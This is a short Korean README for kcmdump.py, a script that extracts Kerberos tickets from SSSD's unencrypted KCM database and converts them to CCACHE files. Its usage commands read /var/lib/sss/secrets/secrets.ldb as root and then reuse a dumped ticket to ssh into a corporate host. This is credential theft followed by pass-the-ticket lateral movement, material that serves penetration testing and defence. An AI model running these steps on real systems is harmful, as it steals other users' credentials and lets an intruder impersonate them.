
SSSD의 KCM 데이터베이스에서 Kerberos 티켓을 덤프합니다.
SSSD에서 사용하는 KCM 데이터베이스를 덤프하고 CCACHE 형식의 Kerberos 티켓을 복구하는 간단한 스크립트입니다.
처음에는 SSSDKCMExtractor와 KCMTicketFormatter를 기반으로 합니다.
버전 2.0.0(2018-08-13)부터 SSSD의 KCM 응답자의 백엔드 저장소는 더 이상 데이터베이스 콘텐츠를 암호화하지 않습니다. 그러나 여전히 LDB 데이터베이스(그 자체는 TDB 기반)에 의존하므로 LDAP 유사 쿼리를 사용하여 쉽게 검색할 수 있습니다.
SSSD는 Kerberos 티켓에 대해 사용자 지정 저장 형식을 사용하며, 이 스크립트를 사용하여 표준 CCACHE 파일로 변환할 수 있습니다.
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local